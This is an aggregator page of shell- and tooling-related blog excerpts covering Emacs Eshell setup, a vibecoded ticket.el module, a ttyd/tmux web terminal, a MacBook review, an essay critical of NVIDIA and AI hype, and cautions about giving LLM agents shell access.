Posts in Shell (20 found)
Brain Baking 6 days ago

A Note On Shelling In Emacs

As you no doubt know by now, we Emacs users have the Teenage Mutant Ninja Power . Expert usage of a Heroes in a Hard Shell is no exception. Pizza Time! All silliness aside, the plethora of options available to the Emacs user when it comes to executing shell commands in “terminals”—real or fake—can be overwhelming. There’s , , , , , and then third party packages further expand this with , , … The most interesting shell by far is the one that’s not a shell but a Lisp REPL that looks like a shell: Eshell . That’s the one I would like to focus one now. But first: why would you want to pull in your work inside Emacs? The more you get used to it, the easier it will be to answer this: because all your favourite text selection, manipulation, … shortcuts will be available to you. Remember how stupendously difficult it is to just shift-select and yank/copy/whatever you want to call it text in your average terminal emulator? That’s why. In Emacs, I can move around the point in that shell buffer however I want. I can search inside that buffer—since everything is just text—however I want. Even the easiest solution, just firing off your vanilla , that in my case runs Zsh, will net you most of these benefits. And then there’s Eshell: the Lisp-powered shell that’s not really a shell but does a really good job in pretending it is. With Eshell you can interact with everything else you’ve got up and running inside Emacs. Want to dump the output to a buffer at point? . Want to see what’s hooked into LSP mode? . Want to create your own commands? and then just . Eshell makes it possible to mix Elisp and your typical Bash-like syntax. The only problem is that Eshell isn’t a true terminal emulator and doesn’t support full-screen terminal programs and fancy TTY stuff. That’s where Eat: Emulate A Terminal comes in. The Eat minor mode is compatible with Eshell: as soon as you execute a command-line program, it takes over. There are four input modes available to you for sending text to the terminal in case your Emacs shortcuts clash with those of the program. It solves all my problems: long-running processes like work; interactive programs like gdu and work, … Yet the default Eshell mode is a bit bare-bones, so obviously I pimped the hell out of it. Here’s a short summary of what my Bakemacs shelling.el config alters: Here’s a short video demonstrating some of these features: The reason for ditching is simple: it’s extremely slow over Tramp. Just pressing TAB while working on a remote machine takes six seconds to load a simple directory structure of a few files, what’s up with that? I’ve been profiling my Tramp connections and connecting to the local NAS over SSH is very slow because apparently can’t do a single and process that info into an autocomplete pop-up. Yet I wanted to keep my Corfu/Cape behaviour that I’m used to working in other buffers so I created my own completion-at-point-function that dispatches smartly to other internals: I’m sure there are holes in this logic but so far it’s been working quite well for me. Cape is very fast as is my own shell command/variable cache. The added bonus is having access to nerd icons. I used to distinguish Elisp vars from external shell vars in case you’re completing as there are only a handful shell variables and a huge number of Elisp ones. I also learned the hard way that you should cache stuff listed in your modeline as this gets continuously redrawn when scrolling through your buffer: The details can be found in —just to be on the safe side, I disabled Git/project specific stuff in case is to avoid more Tramp snailness. The last cool addition: make use of Emacs’s new Completion Preview mode —but only for recent commands. That means I temporarily remap as soon as TAB is pressed. Otherwise, the preview might also show things that I don’t really want. The video showcases this as well. Happy (e)sheling! Related topics: / emacs / By Wouter Groeneveld on 8 March 2026.  Reply via email . Customize at startup Integrate : replaces the default “i-search backward”. This is a gigantic improvement as Consult lets me quickly and visually finetune my search through all previous commands. These are also saved on exit (increase while you’re at it). Improve to immediately kill a process or deactivate the mark. The big one: replace with a custom completion-at-point system (see below). When typing a path like , backspace kills the entire last directory instead of just a single character. This works just like now and speeds up my path commands by a lot. Bind a shortcut to a convenient function that sends input to Eshell & executes it. Change the prompt into a simple to more easily copy-paste things in and out of that buffer. This integrates with meaning I can very easily jump back to a previous command and its output! Move most of the prompt info to the modeline such as the working directory and optional Git information. Make sort by directories first to align it with my Dired change: doesn’t work as is an Elisp function. Bind a shortcut to a convenient pop-to-eshell buffer & new-eshell-tab function that takes the current perspective into account. Make font-lock so it outputs with syntax highlighting. Create a command: does a into the directory of that buffer’s contents. Create a command: stay on the current Tramp host but go to an absolute path. Using will always navigate to your local HDD root so is the same as if you’re used to instead of Emacs’s Tramp. Give Eshell dedicated space on the top as a side window to quickly call and dismiss with . Customise more shortcuts to help with navigation. UP and DOWN (or / ) just move the point, even at the last line, which never works in a conventional terminal. and cycle through command history. Customise more aliases of which the handy ones are: & If the point is at command and … it’s a path: direct to . it’s a local dir cmd: wrap to filter on dirs only. Cape is dumb and by default also returns files. it’s an elisp func starting with : complete that with . else it’s a shell command. These are now cached by expanding all folders from with a fast Perl command. If the point is at the argument and … it’s a variable starting with : create a super CAPF to lisp both Elisp and vars (also cached)! it’s a buffer or process starting with : fine, here , can you handle this? Are you sure? it’s a remote dir cmd (e.g. ): . it’s (still) a local dir cmd: see above. In all other cases, it’s probably a file argument: fall back to just .

0 views
Blog System/5 1 weeks ago

Reflections on vibecoding ticket.el

It has now been a month since I started playing with Claude Code “for real” and by now I’ve mostly switched to Codex CLI: it is much snappier—who would imagine that a “Rewrite in Rust” would make things tangibly faster—and the answers feel more to-the-point than Claude’s to me. As part of this experiment, I decided to go all-in with the crazy idea of vibecoding a project without even looking at the code. The project I embarked on is an Emacs module to wrap a CLI ticket tracking tool designed to be used in conjunction with coding agents. Quite fitting for the journey, I’d say. In this article, I’d like to present a bunch of reflections on this relatively-simple vibecoding journey. But first, let’s look at what the Emacs module does. Oh, you saw em dashes and thought “AI slop article”? Think again. Blog System/5 is still humanly written. Subscribe to support it! CLI-based ticket tracking seems to be a necessity to support driving multiple agents at once, for long periods of time, and to execute complex tasks. A bunch of tools have shown up to track tickets via Markdown files in a way that the agents can interact with. The prime example is Beads by Steve Yegge . I would have used it if I hadn’t read otherwise, but then the article “A ‘Pure Go’ Linux environment, ported by Claude, inspired by Fabrice Bellard” showed up and it contained this gem, paraphrased by yours truly: Beads is a 300k SLOC vibecoded monster backed by a 128MB Git repository, sporting a background daemon, and it is sluggish enough to increase development latency… all to manage a bunch of Markdown files. Like, WTH. The article went on to suggest Ticket (tk) instead: a pure shell implementation of a task tracking tool backed by Markdown files stored in a directory in your repo. This sort of simple tool is my jam and I knew I could start using it right away to replace the ad-hoc text files I typically write. Once I installed the tool and created a nixpkgs package for it —which still requires approval, wink wink—I got to creating a few tickets. As I started using Ticket more and more to keep a local backlog for my EndBASIC compiler and VM rewrite, I started longing for some sort of integration in Doom Emacs. I could edit the Markdown files produced by just fine, of course, but I wanted the ability to find them with ease and to create new tickets right from the editor. Normally, I would have discarded this idea because I don’t know Elisp. However, it quickly hit me: “I can surely ask Claude to write this Emacs module for me”. As it turns out, I could, and within a few minutes I had a barebones module that gave me rudimentary ticket creation and navigation features within Emacs. I didn’t even look at the code, so I continued down the path of refining the module via prompts to fix every bug I found and implement every new idea I had. By now, works reasonably well and fulfills a real need I had, so I’m pretty happy with the result . If you care to look, the nicest thing you’ll find is a tree-based interactive browser that shows dependencies and offers shortcuts to quickly manipulate tickets. doesn’t offer these features, so these are all implemented in Elisp by parsing the tickets’ front matter and implementing graph building and navigation algorithms. After all, Elisp is a much more powerful language than the shell, so this was easier than modifying itself. Should you want to try this out, visit jmmv/ticket.el on GitHub for instructions on how to install this plugin and to learn how to use it. I can’t promise it will function on anything but Doom Emacs even if the vibewritten claims that it does, but if it doesn’t, feel free to send a PR. Alright, so it’s time for those reflections I promised. Well, yes! It took more-or-less prodding to convince the AI that certain features it implemented didn’t work, but with little effort in additional prompts, I was able to fix them in minutes. A big part of why the AI failed to come up with fully working solutions upfront was that I did not set up an end-to-end feedback cycle for the agent. If you take the time to do this and tell the AI what exactly it must satisfy before claiming that a task is “done”, it can generally one-shot changes. But I didn’t do that here. At some point I asked the agent to write unit tests, and it did that, but those seem to be insufficient to catch “real world” Emacs behavior because even if the tests pass, I still find that features are broken when trying to use them. And for the most part, the failures I’ve observed have always been about wiring shortcuts, not about bugs in program logic. I think I’ve only come across one case in which parentheses were unbalanced. Certainly not. While learning Lisp and Elisp has been in my backlog for years and I’d love to learn more about these languages, I just don’t have the time nor sufficient interest to do so. Furthermore, without those foundations already in place, I would just not have been able to create this at all. AI agents allowed me to prototype this idea trivially , for literal pennies, and now I have something that I can use day to day. It’s quite rewarding in that sense: I’ve scratched my own itch with little effort and without making a big deal out of it. Nope. Even though I just said that getting the project to work was rewarding, I can’t feel proud about it. I don’t have any connection to what I have made and published, so if it works, great, and if it doesn’t… well, too bad. This is… not a good feeling. I actually enjoy the process of coding probably more than getting to a finished product. I like paying attention to the details because coding feels like art to me, and there is beauty in navigating the thinking process to find a clean and elegant solution. Unfortunately, AI agents pretty much strip this journey out completely. At the end of the day, I have something that I can use, though I don’t feel it is mine. Not really, and supports why people keep bringing up the Jevons paradox . Yes, I did prompt the agent to write this code for me but I did not just wait idly while it was working: I spent the time doing something else , so in a sense my productivity increased because I delivered an extra new thing that I would have not done otherwise. One interesting insight is that I did not require extended blocks of free focus time—which are hard to come by with kids around—to make progress. I could easily prompt the AI in a few minutes of spare time, test out the results, and iterate. In the past, if I ever wanted to get this done, I’d have needed to make the expensive choice of using my little free time on this at the expense of other ideas… but here, the agent did everything for me in the background. Other than how to better prompt the AI and the sort of failures to routinely expect? No. I’m as clueless as ever about Elisp. If you were to ask me to write a new Emacs module today, I would have to rely on AI to do so again: I wouldn’t be able to tell you how long it might take me to get it done nor whether I would succeed at it. And if the agent got stuck and was unable to implement the idea, I would be lost. This is a very different feeling from other tasks I’ve “mastered”. If you ask me to write a CLI tool or to debug a certain kind of bug, I know I’ll succeed and have a pretty good intuition on how long the task is going to take me. But by working with AI on a new domain… I just don’t, and I don’t see how I could build that intuition. This is uncomfortable and dangerous. You can try asking the agent to give you an estimate, and it will, but funnily enough the estimate will be in “human time” so it won’t have any meaning. And when you try working on the problem, the agent’s stochastic behavior could lead you to a super-quick win or to a dead end that never converges on a solution. Of course it is. Regardless, I just don’t care in this specific case . This is a project I started to play with AI and to solve a specific problem I had. The solution works and it works sufficiently well that I just don’t care how it’s done: after all, I’m not going to turn this Emacs module into “my next big thing”. The fact that I put the code as open source on GitHub is because it helps me install this plugin across all machines in which I run Doom Emacs, not because I expect to build a community around it or anything like that. If you care about using the code after reading this text and you are happy with it, that’s great, but that’s just a plus. I opened the article ranting about Beads’ 300K SLOC codebase, and “bloat” is maybe the biggest concern I have with pure vibecoding. From my limited experience, coding agents tend to take the path of least resistance to adding new features, and most of the time this results in duplicating code left and right. Coding agents rarely think about introducing new abstractions to avoid duplication, or even to move common code into auxiliary functions. They’ll do great if you tell them to make these changes—and profoundly confirm that the refactor is a great idea—but you must look at their changes and think through them to know what to ask. You may not be typing code, but you are still coding in a higher-level sense. But left unattended, you’ll end up with vast amounts of duplication: aka bloat. I fear we are about to see an explosion of slow software like we have never imagined before. And there is also the cynical take: the more bloat there is in the code, the more context and tokens agents need to understand it, so the more you have to pay their providers to keep up with the project. And speaking of open source… we must ponder what this sort of coding process means in this context. I’m worried that vibecoding can lead to a new type of abuse of open source that is hard to imagine: yes, yes, training the AI models has already been done by abusing open source, but that’s nothing compared to what might come in terms of taking over existing projects or drowning them with poor contributions. I’m starting to question my preference for BSD-style licenses all along… and this is such an interesting and important topic that I have more to say, but I’m going to save those thoughts for the next article. Vibecoding has been an interesting experiment. I got exactly what I wanted with almost no effort but it all feels hollow. I’ve traded the joy of building for the speed of prompting, and while the result is useful, it’s still just “slop” to me. I’m glad it works, but I’m worried about what this means for the future of software. Visit ticket and ticket.el to play with these tools if you are curious or need some sort of lightweight ticket management system for your AI interactions.

0 views
Karan Sharma 1 weeks ago

A Web Terminal for My Homelab with ttyd + tmux

I wanted a browser terminal at that works from laptop, tablet, and phone without special client setup. The stack that works cleanly for this is ttyd + tmux. Two decisions matter most: Why each flag matters: reverse proxies to with TLS via Cloudflare DNS challenge. Because ttyd uses WebSockets heavily, reverse proxy support for upgrades is essential. I tuned tmux for long-running agent sessions, not just manual shell use. This was a big pain point, so I added both workflows: Browser-native copy tmux copy mode On mobile, ttyd’s top-left menu (special keys) makes prefix navigation workable. This is tailnet-only behind Tailscale. No public exposure. Still, the container has and , which is a strong trust boundary. If you expose anything like this publicly, add auth in front and treat it as high-risk infrastructure. The terminal is now boring in the best way: stable, predictable, and fast to reach from any device. handles terminal-over-websocket behavior well. enforces a single active client, which avoids cross-tab resize contention. : writable shell : matches my existing Caddy upstream ( ) : one active client only (no resize fight club) : real host shell from inside the container : correct login environment and tmux config loading : persistent attach/re-attach status line shows host + session + path + time pane border shows pane number + current command active pane is clearly highlighted : create/attach named session : create named window : rename window : session/window picker : pane movement : pane resize Browser-native copy to turn tmux mouse off drag-select + browser copy shortcut to turn tmux mouse back on tmux copy mode enters copy mode and shows select, copy (shows ) or exits (shows )

0 views
./techtipsy 1 weeks ago

I gave the MacBook Pro a try

I got the opportunity to try out a MacBook Pro with the M3 Pro with 18GB RAM (not Pro). I’ve been rocking a ThinkPad P14s gen 4 and am reasonably happy with it, but after realizing that I am the only person in the whole company not on a MacBook, and one was suddenly available for use, I set one up for work duties to see if I could ever like using one. It’s nice. I’ve used various flavours of Linux on the desktop since 2014, starting with Linux Mint. 2015 was the year I deleted the Windows dual boot partition. Over those years, the experience on Linux and especially Fedora Linux has improved a lot, and for some reason it’s controversial to say that I love GNOME and its opinionated approach to building a cohesive and yet functional desktop environment. When transitioning over to macOS, I went in with an open mind. I won’t heavily customise it, won’t install Asahi Linux on it, or make it do things it wasn’t meant to do. This is an appliance, I will use it to get work done and that’s it. With this introduction out of the way, here are some observations I’ve made about this experience so far. The first stumbling block was an expected one: all the shortcuts are wrong, and the Ctrl-Super-Alt friendship has been replaced with these new weird ones. With a lot of trial and error, it is not that difficult to pick it up, but I still stumble around with copy-paste, moving windows around, or operating my cursor effectively. It certainly doesn’t help that in terminal windows, Ctrl is still king, while elsewhere it’s Cmd. Mouse gestures are nice, and not that different from the GNOME experience. macOS has window snapping by default, but only using the mouse. I had to install a specific program to enable window moving and snapping with keyboard shortcuts (Rectangle) , which is something I use heavily in GNOME. Odd omission by Apple. For my Logitech keyboard and mouse to do the right thing, I did have to install the Logitech Logi+ app, which is not ideal, but is needed to have an acceptable experience using my MX series peripherals, especially the keyboard where it needs to remap some keys for them to properly work in macOS. I still haven’t quite figured out why Page up/down and Home/End keys are not working as they should be. Also, give my Delete key back! Opening the laptop with Touch ID is a nice bonus, especially on public transport where I don’t really want my neighbour to see me typing in my password. The macOS concept of showing open applications that don’t have windows on them as open in the dock is a strange choice, that has caused me to look for those phantom windows and is generally misleading. Not being able to switch between open windows instead of applications echoes the same design choice that GNOME made, and I’m not a big fan of it here as well. But at least in GNOME you can remap the Alt+Tab shortcut to fix it. The default macOS application installation process of downloading a .dmg file, then opening it, then dragging an icon in a window to the Applications folder feels super odd. Luckily I was aware of the tool and have been using that heavily to get everything that I need installed, in a Linux-y way. I appreciate the concern that macOS has about actions that I take on my laptop, but my god, the permission popups get silly sometimes. When a CLI app is doing things and accessing data on my drive, I can randomly be presented with a permissions pop-up, stealing my focus from writing a Slack message. Video calls work really well, I can do my full stack engineer things, and overall things work, even if it is sometimes slightly different. The default Terminal app is not good, I’m still not quite sure why it does not close the window when I exit it, that “Process exited” message is not helpful. No contest, the hardware on a MacBook Pro feels nice and premium compared to the ThinkPad P14s gen 4. The latter now feels like a flexible plastic piece of crap. The screen is beautiful and super smooth due to the higher refresh rate. The MacBook does not flex when I hold it. Battery life is phenomenal, the need to have a charger is legitimately not a concern in 90% of the situations I use a MacBook in. Keyboard is alright, good to type on, but layout is not my preference. M3 Pro chip is fast as heck. 18 GB of memory is a solid downgrade from 32 GB, but so far it has not prevented me from doing my work. I have never heard the fan kick on, even when testing a lot of Go code in dozens of containers, pegging the CPU at 100%, using a lot of memory, and causing a lot of disk writes. I thought that I once heard it, but no, that fan noise was coming from a nearby ThinkPad. The alumin i um case does have one downside: the MacBook Pro is incredibly slippery. I once put it in my backpack and it made a loud thunk as it hit the table that the backpack was on. Whoops. macOS does not provide scaling options on my 3440x1440p ultra-wide monitor. Even GNOME has that, with fractional scaling! The two alternatives are to use a lower resolution (disgusting), or increase the text size across the OS so that I don’t suffer with my poor eyesight. Never needed those. I like that. Having used an iPhone for a while, I sort of expected this to be a requirement, but no, you can completely ignore those aspects of macOS and work with a local account. Even Windows 11 doesn’t want to allow that! Switching the keyboard language using the keyboard shortcut is broken about 50% of the time, which feels odd given that it’s something that just works on GNOME. This is quite critical for me since I shift between the Estonian and US keyboard a lot when working, as the US layout has the brackets and all the other important characters in the right places for programming and writing, while Estonian keyboard has all the Õ Ä Ö Ü-s that I need. I upgraded to macOS 26.3 Tahoe on 23rd of February. SSH worked in the morning. Upgrade during lunch, come back, bam, broken. The SSH logins would halt at the part where public key authentication was taking place, the process just hung. I confirmed that by adding into the SSH command. With some vibe-debugging with Claude Code, I found that something with the SSH agent service had broken after the upgrade. One reasonably simple fix was to put this in your : Then it works in the shell, but all other git integrations, such as all the repos I have cloned and am using via IntelliJ IDEA, were still broken. Claude suggested that I build my own SSH agent, and install that until this issue is fixed. That’s when I decided to stop. macOS was supposed to just work, and not get into my way when doing work. This level of workaround is something I expect from working with Linux, and even there it usually doesn’t get that odd, I can roll back a version of a package easily, or fix it by pulling in the latest development release of that particular package. I went into this experiment with an open mind, no expectations, and I have to admit that a MacBook Pro with M3 Pro chip is not bad at all, as long as it works. Unfortunately it doesn’t work for me right now. I might have gotten very unlucky with this issue and the timing, but first impressions matter a lot. The hardware can be nice and feel nice, but if the software lets me down and stops me from doing what’s more important, then it makes the hardware useless. It turns out that I like Linux and GNOME a lot. Things are simple, improvements are constant and iterative in nature, so you don’t usually notice it (with Wayland and Pipewire being rare exceptions), and you have more control when you need to fix something. Making those one-off solutions like a DIY coding agent sandbox, or a backup script, or setting up snapshots on my workstation are also super easy. If Asahi Linux had 100% compatibility on all modern M-series MacBooks, then that would be a killer combination. 1 Until then, back to the ol’ reliable ThinkPad P14s gen 4 I go. I can live with fan noise, Bluetooth oddities and Wi-Fi roaming issues, but not with something as basic as SSH not working one day. 2 any kind billionaires want to bankroll the project? Oh wait, that’s an oxymoron.  ↩︎ the fan noise can actually be fixed quite easily by setting a lower temperature target on the Ryzen APU and tuning the fan to only run at the lowest speed after a certain temperature threshold.  ↩︎ any kind billionaires want to bankroll the project? Oh wait, that’s an oxymoron.  ↩︎ the fan noise can actually be fixed quite easily by setting a lower temperature target on the Ryzen APU and tuning the fan to only run at the lowest speed after a certain temperature threshold.  ↩︎

0 views
xenodium 1 weeks ago

Bending Emacs - Episode 13: agent-shell charting

Time for a new Bending Emacs episode. This one is a follow-up to Episode 12 , where we explored Claude Skills as emacs-skills . Bending Emacs Episode 13: agent-shell + Claude Skills + Charts This time around, we look at inline image rendering in agent-shell and how it opens the door to charting. I added a handful of new charting skills to emacs-skills : /gnuplot , /mermaid , /d2 , and /plantuml . The agent extracts or fetches data from context, generates the charting code, saves it as a PNG, and agent-shell renders it inline. Cherry on top: the generated charts match your Emacs theme colors by querying them via . Hope you enjoyed the video! Liked the video? Please let me know. Got feedback? Leave me some comments . Please like my video , share with others, and subscribe to my channel . As an indie dev, I now have a lot more flexibility to build Emacs tools and share knowledge, but it comes at the cost of not focusing on other activities that help pay the bills. If you benefit or enjoy my work please consider sponsoring .

0 views

On NVIDIA and Analyslop

Hey all! I’m going to start hammering out free pieces again after a brief hiatus, mostly because I found myself trying to boil the ocean with each one, fearing that if I regularly emailed you you’d unsubscribe. I eventually realized how silly that was, so I’m back, and will be back more regularly. I’ll treat it like a column, which will be both easier to write and a lot more fun. As ever, if you like this piece and want to support my work, please subscribe to my premium newsletter. It’s $70 a year, or $7 a month, and in return you get a weekly newsletter that’s usually anywhere from 5000 to 18,000 words, including vast, extremely detailed analyses of NVIDIA , Anthropic and OpenAI’s finances , and the AI bubble writ large . I am regularly several steps ahead in my coverage, and you get an absolute ton of value. In the bottom right hand corner of your screen you’ll see a red circle — click that and select either monthly or annual.  Next year I expect to expand to other areas too. It’ll be great. You’re gonna love it.  Before we go any further, I want to remind everybody I’m not a stock analyst nor do I give investment advice.  I do, however, want to say a few things about NVIDIA and its annual earnings report, which it published on Wednesday, February 25: NVIDIA’s entire future is built on the idea that hyperscalers will buy GPUs at increasingly-higher prices and at increasingly-higher rates every single year. It is completely reliant on maybe four or five companies being willing to shove tens of billions of dollars a quarter directly into Jensen Huang’s wallet. If anything changes here — such as difficulty acquiring debt or investor pressure cutting capex — NVIDIA is in real trouble, as it’s made over $95 billion in commitments to build out for the AI bubble .  Yet the real gem was this part: Hell yeah dude! After misleading everybody that it intended to invest $100 billion in OpenAI last year ( as I warned everybody about months ago , the deal never existed and is now effectively dead ), NVIDIA was allegedly “close” to investing $30 billion . One would think that NVIDIA would, after Huang awkwardly tried to claim that the $100 billion was “ never a commitment ,” say with its full chest how badly it wanted to support OpenAI and how intentionally it would do so. Especially when you have this note in your 10-K: What a peculiar world we live in. Apparently NVIDIA is “so close” to a “partnership agreement” too , though it’s important to remember that Altman, Brockman, and Huang went on CNBC to talk about the last deal and that never came together. All of this adds a little more anxiety to OpenAI's alleged $100 billion funding round which, as The Information reports , Amazon's alleged $50 billion investment will actually be $15 billion, with the next $35 billion contingent on AGI or an IPO: And that $30 billion from NVIDIA is shaping up to be a Klarna-esque three-installment payment plan: A few thoughts: Anyway, on to the main event. New term: analyslop, when somebody writes a long, specious piece of writing with few facts or actual statements with the intention of it being read as thorough analysis.  This week, alleged financial analyst Citrini Research (not to be confused with Andrew Left’s Citron Research)  put out a truly awful piece called the “2028 Global Intelligence Crisis,” slop-filled scare-fiction written and framed with the authority of deeply-founded analysis, so much so that it caused a global selloff in stocks .  This piece — if you haven’t read it, please do so using my annotated version — spends 7000 or more words telling the dire tale of what would happen if AI made an indeterminately-large amount of white collar workers redundant.  It isn’t clear what exactly AI does, who makes the AI, or how the AI works, just that it replaces people, and then bad stuff happens. Citrini insists that this “isn’t bear porn or AI-doomer fan-fiction,” but that’s exactly what it is — mediocre analyslop framed in the trappings of analysis, sold on a Substack with “research” in the title, specifically written to spook and ingratiate anyone involved in the financial markets.  Its goal is to convince you that AI (non-specifically) is scary, that your current stocks are bad, and that AI stocks (unclear which ones those are, by the way) are the future. Also, find out more for $999 a year. Let me give you an example: The goal of a paragraph like this is for you to say “wow, that’s what GPUs are doing now!” It isn’t, of course. The majority of CEOs report little or no return on investment from AI , with a study of 6000 CEOs across the US, UK, Germany and Australia finding that “ more than 80%  [detected] no discernable impact from AI on either employment or productivity .” Nevertheless, you read “GPU” and “North Dakota” and you think “wow! That’s a place I know, and I know that GPUs power AI!”  I know a GPU cluster in North Dakota — CoreWeave’s one with Applied Digital that has debt so severe that it loses both companies money even if they have the capacity rented out 24/7 . But let’s not let facts get in the way of a poorly-written story. I don’t need to go line-by-line — mostly because I’ll end up writing a legally-actionable threat — but I need you to know that most of this piece’s arguments come down to magical thinking and the utterly empty prose. For example, how does AI take over the entire economy?  That’s right, they just get better. No need to discuss anything happening today. Even AI 2027 had the balls to start making stuff about “OpenBrain” or whatever. This piece literally just says stuff, including one particularly-egregious lie:  This is a complete and utter lie. A bald-faced lie. This is not something that Claude Code can do. The fact that we have major media outlets quoting this piece suggests that those responsible for explaining how things work don’t actually bother to do any of the work to find out, and it’s both a disgrace and embarrassment for the tech and business media that these lies continue to be peddled.  I’m now going to quote part of my upcoming premium (the Hater’s Guide To Private Equity, out Friday), because I think it’s time we talked about what Claude Code actually does. I’ve worked in or around SaaS since 2012, and I know the industry well. I may not be able to code, but I take the time to speak with software engineers so that I understand what things actually do and how “impressive” they are. Similarly, I make the effort to understand the underlying business models in a way that I’m not sure everybody else is trying to, and if I’m wrong, please show me an analysis of the financial condition of OpenAI or Anthropic from a booster. You won’t find one, because they’re not interested in interacting with reality. So, despite all of this being very obvious , it’s clear that the markets and an alarming number of people in the media simply do not know what they are talking about or are intentionally avoiding thinking about it. The “AI replaces software” story is literally “Anthropic has released a product and now the resulting industry is selling off,” such as when it launched a cybersecurity tool that could check for vulnerabilities (a product that has existed in some form for nearly a decade) causing a sell-off in cybersecurity stocks like Crowdstrike — you know, the one that had a faulty bit of code cause a global cybersecurity incident that lost the Fortune 500 billions , and resulted in Delta Airlines having to cancel over 1,200 flights over a period of several days .  There is no rational basis for anything about this sell-off other than that our financial media and markets do not appear to understand the very basic things about the stuff they invest in. Software may seem complex, but (especially in these cases) it’s really quite simple: investors are conflating “an AI model can spit out code” with “an AI model can create the entire experience of what we know as ‘software,’ or is close enough that we have to start freaking out.” This is thanks to the intentionally-deceptive marketing pedalled by Anthropic and validated by the media. In a piece from September 2025, Bloomberg reported that Claude Sonnet 4.5 could “code on its own for up to 30 hours straight,”  a statement directly from Anthropic repeated by other outlets that added that it did so “on complex, multi-step tasks,” none of which were explained. The Verge, however, added that apparently Anthropic “ coded a chat app akin to Slack or Teams ,” and no, you can’t see it, or know anything about how much it costs or its functionality. Does it run? Is it useful? Does it work in any way? What does it look like? We have absolutely no proof this happened other than Anthropic saying it, but because the media repeated it it’s now a fact.  As I discussed last week, Anthropic’s primary business model is deception , muddying the waters of what’s possible today and what might be possible tomorrow through a mixture of flimsy marketing statements and chief executive Dario Amodei’s doomerist lies about all white collar labor disappearing .  Anthropic tells lies of obfuscation and omission.  Anthropic exploits bad journalism, ignorance and a lack of critical thinking. As I said earlier, the “wow, Claude Code!” articles are mostly from captured boosters and people that do not actually build software being amazed that it can burp up its training data and make an impression of software engineering.  And even if we believe the idea that Spotify’s best engineers are not writing any code , I have to ask: to what end? Is Spotify shipping more software? Is the software better? Are there more features? Are there less bugs? What are the engineers doing with the time they’re saving? A study from last year from METR said that despite thinking they were 24% faster, LLM coding tools made engineers 19% slower.  I also think we need to really think deeply about how, for the second time in a month, the markets and the media have had a miniature shitfit based on blogs that tell lies using fan fiction. As I covered in my annotations of Matt Shumer’s “Something Big Is Happening,” the people that are meant to tell the general public what’s happening in the world appear to be falling for ghost stories that confirm their biases or investment strategies, even if said stories are full of half-truths and outright lies. I am despairing a little. When I see Matt Shumer on CNN or hear from the head of a PE firm about Citrini Research, I begin to wonder whether everybody got where they were not through any actual work but by making the right noises.  This is the grifter economy, and the people that should be stopping them are asleep at the wheel. NVIDIA beat estimates and raised expectations, as it has quarter after quarter. People were initially excited, then started reading the 10-K and seeing weird little things that stood out. $68.1 billion in revenue is a lot of money! That’s what you should expect from a company that is the single vendor in the only thing anybody talks about.  Hyperscaler revenue accounted for slightly more than 50% of NVIDIA’s data center revenue . As I wrote about last year , NVIDIA’s diversified revenue — that’s the revenue that comes from companies that aren’t in the magnificent 7 — continues to collapse. While data center revenue was $62.3 billion, 50% ($31.15 billion) was taken up by hyperscalers…and because we don’t get a 10-Q for the fourth quarter, we don’t get a breakdown of how many individual customers made up that quarter’s revenue. Boo! It is both peculiar and worrying that 36% (around $77.7 billion) of its $215.938 billion in FY2026 revenue came from two customers. If I had to guess, they’re likely Foxconn or Quanta computing, two large Taiwanese ODMs (Original Design Manufacturers) that build the servers for most hyperscalers.  If you want to know more, I wrote a long premium piece that goes into it (among the ways in which AI is worse than the dot com bubble). In simple terms, when a hyperscaler buys GPUs, they go straight to one of these ODMs to put them into servers. This isn’t out of the ordinary, but I keep an eye on the ODM revenues (which publish every month) to see if anything shifts, as I think it’ll be one of the first signs that things are collapsing. NVIDIA’s inventories continue to grow, sitting at over $21 billion (up from around $19 billion last quarter). Could be normal! Could mean stuff isn’t shipping. NVIDIA has now agreed to $27 billion in multi-year-long cloud service agreements — literally renting its GPUs back from the people it sells them to — with $7 billion of that expected in its FY2027 (Q1 FY2027 will report in May 2026).  For some context, CoreWeave (which reports FY2025 earnings today, February 26) gave guidance last November that it expected its entire annual revenue to be between $5 billion and $5.15 billion. CoreWeave is arguably the largest AI compute vendor outside of the hyperscalers. If there was significant demand, none of this would be necessary. NVIDIA “invested” $17.5bn in AI model makers and other early-stage AI startups, and made a further $3.5bn in land, power, and shell guarantees to “support the build-out of complex datacenter infrastructures.” In total, it spent $21bn propping up the ecosystem that, in turn, feeds billions of dollars into its coffers.  NVIDIA’s l ong-term supply and capacity obligations soared from $30.8bn to $95.2bn , largely because NVIDIA’s latest chips are extremely complex and require TSMC to make significant investments in hardware and facilities , and it’s unwilling to do that without receiving guarantees that it’ll make its money back.  NVIDIA expects these obligations to grow .  NVIDIA’s accounts receivable (as in goods that have been shipped but are yet to be paid for) now sits at $38.4 billion, of which 56% ($21.5 billion) is from three customers. This is turning into a very involved and convoluted process! It turns out that it's pretty difficult to actually raise $100 billion. This is a big problem, because OpenAI needs $655 billion in the next five years to pay all its bills , and loses billions of dollars a year. If OpenAI is struggling to raise $100 billion today, I don't see how it's possible it survives. If you're to believe reports, OpenAI made $13.1 billion in revenue in 2025 on $8 billion of losses , but remember, my own reporting from last year said that OpenAI only made around $4.329 billion through September 2025 with $8.67 billion of inference costs alone. It is kind of weird that nobody seems to acknowledge my reporting on this subject. I do not see how OpenAI survives. it coded for 30 hours [from which you are meant to intimate the code was useful or good and that these hours were productive].  it made a Microsoft Teams competitor [that you are meant to assume was full-featured and functional like Teams or Slack, or…functional? And they didn’t even have to prove it by showing you it]  It was able to write uninterruptedly [which you assume was because it was doing good work that didn’t need interruption].

0 views
Maurycy 2 weeks ago

Be careful with LLM "Agents"

I get it: Large Language Models are interesting... but you should not give "Agentic AI" access to your computer, accounts or wallet. To do away with the hype: "AI Agents" are just LLMs with shell access, and at it's core an LLM is a weighted random number generator. You have no idea what it will do It could post your credit card number on social media. This isn't a theoretical concern. There are multiple cases of LLMs wiping people's computers [1] [2] , cloud accounts [3] , and even causing infrastructure outages [4] . What's worse, LLMs have a nasty habit of lying about what they did. What should a good assistant say when asked if it did the thing? "Yes", and did it delete the data­base? "Of course not." They don't have to be hacked to ruin your day. "... but I tested it!" you say. You rolled a die in testing, and rolled it again in production. It might work fine the first time — or the first hundred times — but that doesn't mean it won't misbehave in the future. If you want to try these tools out , run them in a virtual machine. Don't give them access to any accounts that you wouldn't want to lose. Read generated code to make sure it didn't do anything stupid like forgetting to check passwords: (These are real comments from Cloudflare's vibe coded chat server ) ... and keep an eye on them to make sure they aren't being assholes on your behalf .

0 views
(think) 2 weeks ago

How to Vim: To the Terminal and Back

